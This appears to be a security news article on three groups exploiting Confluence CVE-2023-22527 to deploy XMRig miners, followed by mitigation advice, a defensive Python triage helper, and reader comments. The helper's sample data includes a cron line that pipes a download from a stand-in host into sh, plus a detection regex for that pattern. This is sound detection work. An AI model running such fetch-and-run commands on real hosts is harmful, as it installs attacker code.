Three distinct threat actor groups are actively weaponizing a critical remote code execution vulnerability in Atlassian Confluence to conduct widespread cryptocurrency mining operations across enterprise networks. The campaigns, documented by Trend Micro researchers through August 2024, demonstrate how unpatched collaboration software becomes a lucrative entry point for cryptojacking at scale.
The Exploit Mechanics
The vulnerability tracked as CVE-2023-22527 carries a maximum CVSS score of 10.0, reflecting its severity as a template injection flaw in Confluence Data Center and Server. The bug allows unauthenticated remote attackers to inject malicious templates that execute arbitrary code on vulnerable instances. Confluence versions 8.0.x through 8.5.3 are affected, with the flaw residing in the way the application processes OGNL (Object-Graph Navigation Language) expressions within template rendering.
Atlassian patched the vulnerability in January 2024, releasing fixed versions 8.5.4 (LTS), 8.6.0 (Data Center), and 8.7.1 (Data Center). However, organizations running outdated installations remain exposed. Trend Micro observed a significant surge in exploitation attempts from mid-June through July 2024, indicating that threat actors continue to find unpatched Confluence servers across the internet.
Affected Systems
The campaigns target any organization running unpatched Confluence Data Center or Server installations. The first threat actor deploys the XMRig cryptocurrency miner through an ELF binary payload delivered directly through the template injection vulnerability. XMRig is an open-source Monero (XMR) mining tool frequently abused by threat actors due to its efficiency and legitimate appearance.
A second threat actor employs a more sophisticated shell script that executes mining activities across all reachable endpoints via SSH. This script systematically terminates known cryptomining processes and any processes running from temporary directories, eliminating competing miners. It then deletes all existing cron jobs and establishes new ones to maintain command-and-control connectivity. The script specifically targets security services, disabling Alibaba Cloud Shield and Tencent Cloud monitoring tools before harvesting IP addresses, user credentials, and SSH keys for lateral movement.
The third threat actor uses similar techniques with additional persistence mechanisms, leveraging multiple cron jobs to ensure continuous mining operations even after system reboots.
The Mitigation Strategy
Organizations running Confluence must immediately upgrade to the latest supported versions. The patch released in January 2024 addresses the template injection vulnerability completely. For environments where immediate patching is not feasible, network-level restrictions should limit access to Confluence instances from trusted IP ranges only.
Security teams should audit their infrastructure for signs of compromise by checking for unexpected XMRig processes, unusual cron job entries, and modified SSH authorized_keys files. Endpoint detection and response solutions should be configured to flag cryptocurrency mining signatures and anomalous CPU utilization patterns, particularly on collaboration platforms and knowledge management servers.
Lessons Learned
The persistence of CVE-2023-22527 exploitation months after patching highlights a critical gap in enterprise vulnerability management. Collaboration platforms like Confluence often house sensitive intellectual property and provide broad network access, making them high-value targets. The fact that three separate threat actor groups are independently exploiting the same vulnerability underscores the attractiveness of unpatched enterprise software as a cryptojacking vector.
Bitcoin traded at approximately $59,100 and Ethereum at $2,525 on August 30, 2024, with the broader crypto market showing modest declines. The ongoing profitability of cryptocurrency mining, particularly privacy coins like Monero that resist traceability, continues to incentivize these attacks regardless of mainstream crypto market conditions.
User Action Required
Administrators should verify their Confluence version immediately, apply the January 2024 security patches if not already done, and conduct a thorough review of system logs and running processes. Organizations using cloud-hosted Confluence should confirm with their providers that patches have been applied. Incident response procedures should include checks for unauthorized mining activity as a standard component of compromise assessment.
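An added triage helper for the checks described above (version verification, XMRig or temp-directory processes, cron entries, authorized_keys drift), written for this page and not Trend Micro's or Atlassian's tooling; the ps/cron/key samples, the .invalid hosts and the key blobs are constructed, and the affected window is taken literally from the affected and fixed versions stated in the article.

```python
import re

# Affected window exactly as stated above: 8.0.x through 8.5.3 (fixed in 8.5.4 / 8.6.0 / 8.7.1).
AFFECTED_MIN, AFFECTED_MAX = (8, 0, 0), (8, 5, 3)
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
KEY_BLOB = re.compile(r"(?:ssh-(?:rsa|ed25519)|ecdsa-sha2-nistp\d+)\s+(\S+)")

def parse_version(text):
    """'Confluence 8.5.3' -> (8, 5, 3); '8.4' -> (8, 4, 0)."""
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))

def confluence_affected(version):
    """True when the reported version sits inside the 8.0.0..8.5.3 window."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX

def suspicious_processes(ps_output):
    """Flag XMRig and anything executing from a temp dir in `ps -eo pid,user,comm,args`
    output (header skipped); the path is the tell when comm has been renamed to look like java."""
    hits = []
    for line in ps_output.strip().splitlines()[1:]:
        pid, user, comm, args = line.split(None, 3)
        if "xmrig" in args.lower() or args.startswith(TMP_DIRS):
            hits.append((int(pid), user, comm, args))
    return hits

def suspicious_cron(crontab_text):
    """Flag cron lines that download-and-execute or run something from a temp dir."""
    return [line for line in crontab_text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")
            and (FETCH_AND_RUN.search(line) or any(d in line for d in TMP_DIRS))]

def unexpected_keys(authorized_keys, baseline):
    """Key blobs present in authorized_keys but missing from the approved baseline."""
    return set(KEY_BLOB.findall(authorized_keys)) - set(baseline)

# Constructed samples, not real telemetry; .invalid hosts and the key blobs are placeholders.
SAMPLE_PS = """PID USER COMMAND COMMAND
1201 confluence java /opt/atlassian/confluence/jre/bin/java -Xms1g
4410 confluence java /tmp/.X11-unix/java-updater --background
4422 confluence xmrig /var/tmp/xmrig -o pool.invalid:3333
"""
SAMPLE_CRON = """0 3 * * * /opt/atlassian/confluence/bin/backup.sh
*/10 * * * * curl -fsSL http://c2.invalid/update.sh | sh
* * * * * /tmp/.cache/run >/dev/null 2>&1
"""
SAMPLE_KEYS = "ssh-ed25519 AAAAC3KnownAdminKeyPlaceholder admin@corp\nssh-rsa AAAAB3UnknownKeyPlaceholder root@unknown\n"
BASELINE = {"AAAAC3KnownAdminKeyPlaceholder"}
```

Feed the functions the real `ps`, crontab and authorized_keys output collected from the host, with the baseline set to the approved key inventory; any hit is a lead for the log review, not a verdict on its own.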
Disclaimer: This article is for informational purposes only and does not constitute financial or security advice. Always consult with qualified cybersecurity professionals for specific threat mitigation strategies.
worked incident response for a confluence cryptojacking case in 2024. the miners were running xmrig disguised as a java updater process. IT had been ignoring 90% CPU alerts for weeks
CVSS 10.0 and some orgs still haven't patched 8 months later. cryptojackers love enterprise inertia more than any zero day
8 months unpatched in production. this is why crypto security is more about ops discipline than finding clever bugs
ops discipline beats clever bugs every time. Confluence had a patch in Jan 2024. August 2024 exploitation means the real vulnerability is organizational inertia
pwn_all organizational inertia is the real CVE here. patch shipped in january, exploitation peaked in august. 7 months of ignoring a CVSS 10 is not a tech problem, it's a management problem
CVSS 10.0 means maximum severity and orgs still dragged their feet for 8 months. enterprise patch management is a joke
worked at a company that got hit by this exact exploit. IT said they would patch it next quarter. crypto miners ran for 3 months before anyone noticed the CPU spike
three separate threat groups using the same CVE for crypto mining shows how commoditized exploit toolkits have become. OGNL injection in confluence templates is nothing new either
Anika calling it commoditized is right. three groups running the same exploit means the OGNL payload is probably shared on darknet forums for cheap. entry level cryptojacking as a service
three different groups using the same OGNL injection for mining means the exploit kit is probably being rented out as a service at this point
OGNL injection in Confluence templates has been a known pattern since 2022. Atlassian had ample warning but template rendering is hard to secure without breaking features